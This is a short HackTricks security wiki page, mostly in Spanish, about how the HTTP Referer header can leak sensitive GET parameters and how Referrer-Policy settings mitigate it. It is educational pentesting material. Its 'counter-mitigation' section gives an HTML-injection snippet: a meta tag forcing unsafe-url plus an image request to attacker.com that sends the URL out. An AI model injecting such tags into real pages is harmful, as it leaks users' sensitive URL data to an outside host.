Interesting HTTP

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Encabezados y políticas de referencia

Referrer es el encabezado utilizado por los navegadores para indicar cuál fue la página anterior visitada.

Información sensible filtrada

Si en algún momento dentro de una página web se encuentra información sensible en los parámetros de una solicitud GET, si la página contiene enlaces a fuentes externas o un atacante puede hacer/sugerir (ingeniería social) que el usuario visite una URL controlada por el atacante. Podría ser capaz de exfiltrar la información sensible dentro de la última solicitud GET.

Mitigación

Puedes hacer que el navegador siga una política de referencia que podría evitar que la información sensible sea enviada a otras aplicaciones web:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Contra-Mitigación

Puedes anular esta regla utilizando una etiqueta meta HTML (el atacante necesita explotar una inyección HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Defensa

Nunca pongas datos sensibles dentro de parámetros GET o rutas en la URL.

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

PreviousOther Web Tricks NextAndroid Forensics

Last updated 4 days ago